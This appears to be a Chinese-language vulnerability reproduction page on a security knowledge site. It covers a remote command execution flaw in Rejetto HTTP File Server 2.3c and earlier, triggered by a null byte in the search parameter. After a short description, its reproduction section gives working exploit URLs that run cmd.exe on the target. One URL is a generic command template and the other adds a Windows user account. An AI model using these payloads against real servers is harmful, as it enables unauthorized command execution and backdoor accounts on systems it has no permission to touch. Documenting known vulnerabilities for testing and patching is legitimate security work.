menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right Hfs 远程命令执行漏洞 chevron_right Hfs 远程命令执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Hfs 远程命令执行漏洞.md
    621 B / 2021-07-15 19:53:43
        Hfs 远程命令执行漏洞
    ====================
    
    一、漏洞简介
    ------------
    
    Rejetto HTTP File Server
    2.3c及之前版本中的parserLib.pas文件中的'findMacroMarker'函数中存在安全漏洞,该漏洞源于parserLib.pas文件没有正确处理空字节。远程攻击者可借助搜索操作中的'%00'序列利用该漏洞执行任意程序。
    
    二、漏洞影响
    ------------
    
    2.3c以前的2.3x版本
    
    三、复现过程
    ------------
    
        http://www.0-sec.org:8080/?search==%00{.exec|cmd.exe /c [Command-String].}
        http://www.0-sec.org:8080/?search==%00{.exec|cmd.exe /c net user test1234 1234 /add.}
    
    
    links
    file_download